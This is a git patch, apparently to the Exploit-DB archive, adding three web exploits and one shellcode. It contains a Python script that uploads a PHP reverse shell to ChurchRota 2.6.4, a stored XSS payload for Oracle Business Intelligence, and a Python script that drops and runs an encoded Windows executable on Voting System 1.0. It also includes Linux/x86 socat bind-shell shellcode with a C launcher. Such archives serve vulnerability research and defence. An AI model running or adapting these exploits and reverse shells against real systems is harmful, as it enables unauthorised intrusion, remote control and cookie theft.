From d65226277cbee89a80d143855999788ff89706c5 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 21 Jan 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-01-21

4 changes to exploits/shellcodes

ChurchRota 2.6.4 - RCE (Authenticated)
Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)

Linux/x86 - Socat Bind Shellcode (113 bytes)
---
 exploits/multiple/webapps/49443.py  | 48 ++++++++++++++
 exploits/multiple/webapps/49444.txt | 12 ++++
 exploits/php/webapps/49445.py       | 98 +++++++++++++++++++++++++++++
 files_exploits.csv                  |  3 +
 files_shellcodes.csv                |  1 +
 shellcodes/linux_x86/49446.c        | 72 +++++++++++++++++++++
 6 files changed, 234 insertions(+)
 create mode 100755 exploits/multiple/webapps/49443.py
 create mode 100644 exploits/multiple/webapps/49444.txt
 create mode 100755 exploits/php/webapps/49445.py
 create mode 100644 shellcodes/linux_x86/49446.c

diff --git a/exploits/multiple/webapps/49443.py b/exploits/multiple/webapps/49443.py
new file mode 100755
index 000000000..a979dd5d8
--- /dev/null
+++ b/exploits/multiple/webapps/49443.py
@@ -0,0 +1,48 @@
+# Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated)
+# Date: 1/19/2021
+# Exploit Author: Rob McCarthy (@slixperi)
+# Vendor Homepage: https://github.com/Little-Ben/ChurchRota
+# Software Link: https://github.com/Little-Ben/ChurchRota
+# Version: 2.6.4
+# Tested on: Ubuntu
+
+import requests
+from pwn import listen
+
+############################################################################################################
+# Description                                                                                              #
+# Church Rota version 2.6.4 is vulnerable to authenticated remote code execution.                          #
+# The user does not need to have file upload permission in order to upload and execute an arbitrary file.  #
+# The application is written primarily with PHP so we use PHP in our PoC                                   #
+############################################################################################################
+
+# credentials of the low privilege user
+USERNAME='slixperi'
+PASSWORD='slixperi'
+
+LISTENER_IP = '127.0.0.1'
+LISTENER_PORT = '4444'
+TARGET_IP = '127.0.0.1'
+TARGET_PORT = '8081'
+
+# set the credentials for login POST
+credentials = {"username":USERNAME,"password":PASSWORD}
+# create a session to preserve session state
+sesh = requests.session()
+# login as our low-privilege user (normally only admins can upload files)
+sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials)
+
+# define the payload
+payload = f"<?php $sock=fsockopen(\"{LISTENER_IP}\",{LISTENER_PORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>"
+
+# file upload
+sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"})
+files = {'resourcefile': ("shell.php", payload)}
+sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files)
+
+l = listen(LISTENER_PORT)
+
+# execute the file
+sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php")
+
+l.interactive()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49444.txt b/exploits/multiple/webapps/49444.txt
new file mode 100644
index 000000000..0079d3cac
--- /dev/null
+++ b/exploits/multiple/webapps/49444.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
+# Exploit Author: omurugur
+# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
+# Version: 11.1.1.7.140715
+# Author Web: https://www.justsecnow.com
+# Author Social: @omurugurrr
+
+Stored  XSS:
+
+“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}
+
+Vulnerable area = Dashboard - Add New Text
\ No newline at end of file
diff --git a/exploits/php/webapps/49445.py b/exploits/php/webapps/49445.py
new file mode 100755
index 000000000..d8911c218
--- /dev/null
+++ b/exploits/php/webapps/49445.py
@@ -0,0 +1,98 @@
+# Exploit Title: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
+# Date: 19/01/2021
+# Exploit Author: Richard Jones
+# Vendor Homepage:https://www.sourcecodester.com/php/12306/voting-system-using-php.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10 2004 + XAMPP 7.4.4
+
+import requests
+
+# --- Edit your settings here ----
+IP = "192.168.1.207" # Website's URL
+USERNAME = "potter" #Auth username
+PASSWORD = "password" # Auth Password
+REV_IP = "192.168.1.207" # Reverse shell IP
+REV_PORT = "8888" # Reverse port 
+# --------------------------------
+
+INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php"
+LOGIN_URL = f"http://{IP}/votesystem/admin/login.php"
+VOTE_URL = f"http://{IP}/votesystem/admin/voters_add.php"
+CALL_SHELL = f"http://{IP}/votesystem/images/shell.php"
+
+payload = """
+  
+<?php
+
+header('Content-type: text/plain');
+$ip   = "IIPP";
+$port = "PPOORRTT";
+$payload = "7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGKMjXUoxZGWentbq1gpCChGgggVFWcoIFhpL7wwVb2ABT33oN6uDm+tt9b966233l7Z39779/32zvedZJ3z7RO1yQjgAAAAUUUQALgAvBEO8D+LBlWqcx0VqLK+4XIBw7vhEr9VooKylIoMpVAGpQnlcgUMpYohpVoOSeRQSHQcJFOIxB42NiT22xoxoQDAw+CAH1KaY/9dtw+g4cgYrAMAoQEd1ZPopwG1lai2v13dDI59s27M2/W/TX4zhwru9Qi9jem/4fTfbwKt54cB/mPZagIA5n+QlxCT5PnaOfm7BWH/cn37UJ7Xv7fxev+z/srjvOF5/7a59rccu7/wTD4enitmvtzFxhprXWZ0rHvn3Z0jVw8CQCEVZbgBwCIACBhqQ5A47ZBfeQSHAxSZYNa1EDYRIIDY6p7xKZBNRdrZFDKdsWhgWF7TTaW3gQTrZJAUYHCfCBjvctfh6OWAJ2clIOCA+My6kdq5XGeKqxuRW9f10cvkcqZAGaR32rvd+nNwlW5jf6ZCH0zX+c8X2V52wbV4xoBS/a2R+nP2XDqFfFHbPzabyoKHbB406JcRj/qVH/afPHd5GLfBPH+njrX2ngFeBChqqmU0N72r53JM4H57U07gevzjnkADXhlVj5kNEHeokIzlhdpJDK3wuc0tWtFJwiNpzWUvk7bJbXOjmyE7+CAcGXj4Vq/iFd4x8IC613I+0IoWFOh0qxjnLUgAYYnLcL3N+W/tCi8ggKXCq2vwNK6+8ilmiaHKSPZXdKrq1+0tVHkyV/tH1O2/FHtxVgHmccSpoZa5ZCO9O3V3P6aoKyn/n69K535eDrNc9UQfmDw6aqiuNFx0xctZ+zBD7SOT9oXWA5kvfUqcLxkjF2Ejy49W7jc/skP6dOM0oxFIfzI6qbehMItaYb8E3U/NzAtnH7cCnO7YlAUmKuOWukuwvn8B0cHa1a9nZJS8oNVsvJBkGTRyt5jjDJM5OVU87zRk+zQjcUPcewVDSbhr9dcG+q+rDd+1fVYJ1NEnHYcKkQnd7WdfGYoga/C6RF7vlEEEvdTgT6uwxAQM5c4xxk07Ap3yrfUBLREvDzdPdI0k39eF1nzQD+SR6BSxed1mCWHCRWByfej33WjX3vQFj66FVibo8bb1TkNmf0NoE/tguksTNnlYPLsfsANbaDUBNTmndixgsCKb9QmV4f2667Z1n8QbEprwIIfIpoh/HnqXyfJy/+SnobFax1wSy8tXWV30MTG1UlLVKPbBBUz29QEB33o2tiVytuBmpZzsp+JEW7yre76w1XOIxA4WcURWIQwOuRd0D1D3s1zYxr6yqp8beopn30tPIdEut1sTj+5gdlNSGHFs/cKD6fTGo1WV5MeBOdV5/xCHpy+WFvLO5ZX5saMyZrnN9mUzKht+IsbT54QYF7mX1j7rfnnJZkjm72BJuUb3LCKyMJiRh23fktIpRF2RHWmszSWNyGSlQ1HKwc9jW6ZX3xa693c8b1UvcpAvV84NanvJPmb9ws+1HrrKAphe9MaUCDyGUPxx+osUevG0W3D6vhun9AX2DJD+nXlua7tLnFX197wDTIqn/wcX/4nEG8RjGzen8LcYhNP3kYXtkBa28TMS2ga0FO+WoY7uMdRA9/r7drdA2udNc7d6U7C39NtH7QvGR1ecwsH0Cxi7JlYjhf3A3J76iz5+4dm9fUxwqLOKdtF1jW0Nj7ehsiLQ7f6P/CE+NgkmXbOieExi4Vkjm6Q7KEF+dpyRNQ12mktNSI9zwYjVlVfYovFdj2P14DHhZf0I7TB22IxZ+Uw95Lt+xWmPzW7zThCb2prMRywnBz4a5o+bplyAo0eTdI3vOtY0TY1DQMwx0jGv9r+T53zhnjqii4yjffa3TyjbRJaGHup48xmC1obViCFrVu/uWY2daHTSAFQQwLww7g8mYukFP063rq4AofErizmanyC1R8+UzLldkxmIz3bKsynaVbJz6E7ufD8OTCoI2fzMXOa67BZFA1iajQDmTnt50cverieja4yEOWV3R32THM9+1EDfyNElsyN5gVfa8xzm0CsKE/Wjg3hPR/A0WDUQ1CP2oiVzebW7RuG6FPYZzzUw+7wFMdg/0O1kx+tu6aTspFkMu0u3Py1OrdvsRwXVS3qIAQ/nE919fPTv6TusHqoD9P56vxfJ5uyaD8hLl1HbDxocoXjsRxCfouJkibeYUlQMOn+TP62rI6P6kHIewXmbxtl59BxMbt6Hn7c7NL7r0LfiF/FfkTFP1z7UF9gOjYqOP694ReKlG8uhCILZ4cLk2Louy9ylYDaB5GSpk03l7upb584gR0DH2adCBgMvutH29dq9626VPPCPGpciG6fpLvUOP4Cb6UC9VA9yA9fU1i+m5Vdd6SaOFYVjblJqhq/1FkzZ0bTaS9VxV1UmstZ8s3b8V7qhmOa+3Klw39p5h/cP/woRx4hVQfHLQV7ijTbFfRqy0T0jSeWhjwNrQeRDY9fqtJiPcbZ5xED4xAdnMnHep5cq7+h79RkGq7v6q+5Hztve262b260+c9h61a6Jpb+ElkPVa9Mnax7k4Qu+Hzk/tU+ALP6+Frut4L8wvwqXOIaVMZmDCsrKJwU91e/13gGfet8EPgZ8eoaeLvXH+JpXLR8vuALdasb5sXZVPKZ7Qv+8X0qYKPCNLid6Xn7s92DbPufW/GMMQ4ylT3YhU2RP3jZoIWsTJJQvLzOb4KmixmIXZAohtsI0xO4Ybd9QtpMFc0r9i+SkE/biRFTNo+XMzeaXFmx0MEZvV+T2DvOL4iVjg0hnqSF5DVuA58eyHQvO+yIH82Op3dkiTwGDvTOClHbC54L6/aVn9bhshq5Zntv6gbVv5YFxmGjU+bLlJv9Ht/Wbidvvhwa4DwswuF155mXl7pcsF8z2VUyv8Qa7QKpuTN//d9xDa73tLPNsyuCD449KMy4uvAOH80+H+nds0OGSlF+0yc4pyit0X80iynZmCc7YbKELGsKlRFreHr5RYkdi1u0hBDWHIM7eLlj7O/A8PXZlh5phiVzhtpMYTVzZ+f0sfdCTpO/riIG/POPpI3qonVcE636lNy2w/EBnz7Os+ry23dIVLWyxzf8pRDkrdsvZ7HMeDl9LthIXqftePPJpi25lABtDHg1VWK5Gu7vOW9fBDzRFw2WWAMuBo6Xbxym8Fsf9l0SV3AZC7kGCxsjFz95ZcgEdRSerKtHRePpiaQVquF8KOOiI58XEz3BCfD1nOFnSrTOcAFFE8sysXxJ05HiqTNSd5W57YvBJU+vSqKStAMKxP+gLmOaOafL3FLpwKjGAuGgDsmYPSSpJzUjbttTLx0MkvfwCQaQAf102P1acIVHBYmWwVKhSiVWpPit8M6GfEQRRbRVLpZA/lKaQy8VpsFhEIgHB0VFxMaHB6CxiYnKAKIk8I2fmNAtLZGIoXSiRqpVifxIAQRskNQ6bXylhtVD6njqPGYhXKL/rqrkOLUzNW6eChDBWJFo63lv7zXbbrPU+CfJMuSJHDmUVjshrxtUixYYPFGmLJAqGUgHXX5J1kRV7s9er6GEeJJ/5NdluqRLhkvfFhs+whf0Qzspoa7d/4ysE834sgNlJxMylgGAJxi3f8fkWWd9lBKEAXCpRiw2mgjLVBCeV6mvFowZg7+E17kdu5iyJaDKlSevypzyxoSRrrpkKhpHpC6T0xs6p6hr7rHmQrSbDdlnSXcpBN8IR2/AkTtmX7BqWzDgMlV6LC04oOjVYNw5GkAUg1c85oOWTkeHOYuDrYixI0eIWiyhhGxtT6sznm4PJmTa7bQqkvbn8lt044Oxj890l3VtssRWUIGuBliVcQf8yrb1NgGMu2Ts7m1+pyXliaZ9LxRQtm2YQBCFaq43F+t24sKJPh3dN9lDjGTDp6rVms5OEGkPDxnZSs0vwmZaTrWvuOdW/HJZuiNaCxbjdTU9IvkHkjVRv4xE7znX3qLvvTq+n0pMLIEffpLXVV/wE5yHZO9wEuojBm3BeUBicsdBXS/HLFdxyv5694BRrrVVM8LYbH7rvDb7D3V1tE3Z31dG9S9YGhPlf71g+/h6peY/K573Q0EjfHutRkrnZdrPR/Nx4c/6NgpjgXPn+1AM3lPabaJuLtO717TkhbaVJpCLp8vFPQyE+OdkdwGws2WN78WNC/ADMUS/EtRyKKUmvPSrFTW8nKVllpyRlvrxNcGGpDHW/utgxRlWpM47cXIbzWK0KjyeI7vpG3cXBHx48fioKdSsvNt180JeNugNPp/G9dHiw7Mp6FuEdP1wYWuhUTFJ6libBKCsrMZbB142LSypxWdAyEdoHZLmsqrQC3GieGkZHQBZOFhLxmeacNRRfn8UEEw6BSDv3/svZRg7AwtklaCK5QBKOUrB3DzG/k8Ut9RRigqUKlRh83jsdIZSLpGKlWAiLY5SKNOT6cPV+Li1EbA+LJbAkTSiNE6dV9/A4cQ6hcjulfbVVZmIu3Z8SvqJHrqhZmC2hymXipRuE7sLUjurA6kgukydUsZRzlDbPb3z4MkohUksLnEO4yPiQlX1EHLwaVmetlacrDvUkqyB8Trbk/U/GZeIu3qVseyKcIN/K//lV9XLR58ezHMIkUjMLq1wxES9VCU9I1a9ivB/eOJMPB9CqZDWODTaJwqSwqjjyyDdWw2ujU7fND/+iq/qlby6fnxEumy//OkMb1dGgomZhxRib9B07XlTLBsVuKr4wiwHnZdFqb8z+Yb8f4VCq1ZK2R6c9qAs9/eAfRmYn00uZBIXESp6YMtAnXQhg0uen5zzvTe7PIcjEsrSsvNUElSRD3unww3WhNDs9CypOP1sp7Rr/W1NiHDeOk7mQa1cfVG5zpy246x2pU531eShXlba8dkLYsCNVIhd5qwJmJTukgw4dGVsV2Z2b6lPztu86tVUuxePD25Uq6SZi/srizBWcgzGhPAwR7Z/5GkFLc2z7TOdM9if/6ADM0mFNQ9IQPpl+2JO8ec78bsd7GDAgT36LepLCyVqCAyCC8s4KkM6lZ3Xi13kctDIuZ+JalYDn9jaPD2UllObdJQzj4yLyVC+4QOAk8BANRN5eIRWen8JWOAwNyVyYJg+l2yTdEN3a6crkeIi3FnRAPUXKspM4Vcwc15YJHi5VrTULwkp3OmpyJMFZo5iKwRP4ecGx8X40QcYB5gm2KyxVHaI8DYCMi7Yyxi7NBQoYbzpVNoC87VkFDfaVHMDQYOEjSKL2BmKhG1/LHnxYCSEc06Um6OdpR6YZXcrhCzNt/O8QhgnTpRpVW78NVf1erdoBnNLmSh8RzdaOITCsu/p7fusfAjXE/dPkH4ppr2ALXgLPEER7G2OwW6Z9OZ1N24MNQhe1Vj0xmIY+MYx6rLYR1BG010DtIJjzC+bWIA+FU3QTtTvRle4hhLsPBGByJjRrAPVTPWEPH0y/MkC8YqIXNy2e1FgGMGMzuVYlHT92GhoAIwDoCdYmOEDPBw2FnoAJ3euzGO01InJYhPqH0HJEE9yte5EY8fRMAnJ45sUESifocFozaHmMHM5FAf0ZKTqi1cYQpH7mVUFM/DYwLhG5b9h9Ar16GihfI3DLT4qJj5kBkwzHZ4iG+rVoUqKX6auNa2O2YeKQ20JDCFuzDVjZpP5VO6QZ9ItFEMucDQ2ghgNMf1Nkgm224TYiMJv+469Iu2UkpZGCljZxAC2qdoI39ncSYeIA/y//C6S0HQBE7X/EvkBjzZ+wSjQu+RNWj8bG9v++bjOK30O1H9XnqGJvAwD99pu5eW8t+631fGsjQ2PXh/J8vD1CeDxApspOU8LoMU4KJMZ581H0jRsdHPmWAfAUQhFPkqoUKvO4ABAuhmeeT1yRSClWqQBgg+T10QzFYPRo91vMlUoVab9FYUqxGP3m0FzJ6+TXiQBfokhF//zoHVuRlimG0dozN+f/O7/5vwA=";
+$evalCode = gzinflate(base64_decode($payload));
+$evalArguments = " ".$port." ".$ip;
+$tmpdir ="C:\\windows\\temp";
+chdir($tmpdir);
+$res .= "Using dir : ".$tmpdir;
+$filename = "D3fa1t_shell.exe";
+$file = fopen($filename, 'wb');
+fwrite($file, $evalCode);
+fclose($file);
+$path = $filename;
+$cmd = $path.$evalArguments;
+$res .= "\n\nExecuting : ".$cmd."\n";
+echo $res;
+$output = system($cmd);
+			            
+?>
+"""
+payload = payload.replace("IIPP", REV_IP)
+payload = payload.replace("PPOORRTT", REV_PORT)
+
+s = requests.Session()
+
+def getCookies():
+    r = s.get(INDEX_PAGE)
+    return r.cookies
+
+def login():
+    cookies = getCookies()
+    data = {
+        "username":USERNAME,
+        "password":PASSWORD,
+        "login":""
+    }
+    r = s.post(LOGIN_URL, data=data, cookies=cookies)
+    if r.status_code == 200:
+        print("Logged in")
+        return True
+    else:
+        return False
+
+def sendPayload():
+    if login():
+        global payload
+        payload = bytes(payload, encoding="UTF-8")
+        files  = {'photo':('shell.php',payload, 
+                    'image/png', {'Content-Disposition': 'form-data'}
+                  ) 
+              }
+        data = {
+            "firstname":"a",
+            "lastname":"b",
+            "password":"1",
+            "add":""
+        }
+        r = s.post(VOTE_URL, data=data, files=files)
+        if r.status_code == 200:
+            print("Poc sent successfully")
+        else:
+            print("Error")
+
+def callShell():
+    r = s.get(CALL_SHELL, verify=False)
+    if r.status_code == 200:
+        print("Shell called check your listiner")
+print("Start a NC listner on the port you choose above and run...")
+sendPayload()
+callShell()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dec7d162b..fd319346d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -25887,6 +25887,9 @@ id,file,description,date,author,type,platform,port
 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
+49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
+49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
+49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index a22c21b2d..91bbba5c5 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1,6 +1,7 @@
 id,file,description,date,author,type,platform
 14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux
+49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Socat Bind Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86
 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
 13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
diff --git a/shellcodes/linux_x86/49446.c b/shellcodes/linux_x86/49446.c
new file mode 100644
index 000000000..5d02bc4e0
--- /dev/null
+++ b/shellcodes/linux_x86/49446.c
@@ -0,0 +1,72 @@
+/* Exploit Title: Linux/x86 - Socat Bind Shellcode (113 bytes)
+  Date: 01-19-2021
+  Author: Felipe Winsnes
+  Tested on: Debian x86
+  Shellcode Length: 113
+
+global _start
+
+section .text
+
+_start:
+
+        xor eax, eax
+        push eax
+
+        PUSH 0x30303030 ; "tcp-listen:10000"
+        PUSH 0x313a6e65
+        PUSH 0x7473696c
+        PUSH 0x2d706374
+
+        mov esi, esp
+        push eax
+
+        PUSH 0x2c656e61 ; "exec:'bash',pty,stderr,setsid,sigint,sane,"
+        PUSH 0x732c746e
+        PUSH 0x69676973
+        PUSH 0x2c646973
+        PUSH 0x7465732c
+        PUSH 0x72726564
+        PUSH 0x74732c79
+        PUSH 0x74702c68
+        PUSH 0x7361623a
+        PUSH 0x63657865
+
+        mov edi, esp
+        push eax
+
+        PUSH 0x7461636f ; "///usr/bin/socat"
+        PUSH 0x732f6e69
+        PUSH 0x622f7273
+        PUSH 0x752f2f2f
+
+        mov ebx, esp
+        push eax
+
+        mov edx, esp
+
+        push esi
+        push edi
+        push ebx
+
+        mov ecx, esp
+        mov al, 11
+        int 0x80
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x50\x68\x30\x30\x30\x30\x68\x65\x6e\x3a\x31\x68\x6c\x69\x73\x74\x68\x74\x63\x70\x2d\x89\xe6\x50\x68\x61\x6e\x65\x2c\x68\x6e\x74\x2c\x73\x68\x73\x69\x67\x69\x68\x73\x69\x64\x2c\x68\x2c\x73\x65\x74\x68\x64\x65\x72\x72\x68\x79\x2c\x73\x74\x68\x68\x2c\x70\x74\x68\x3a\x62\x61\x73\x68\x65\x78\x65\x63\x89\xe7\x50\x68\x6f\x63\x61\x74\x68\x69\x6e\x2f\x73\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x89\xe2\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+  printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file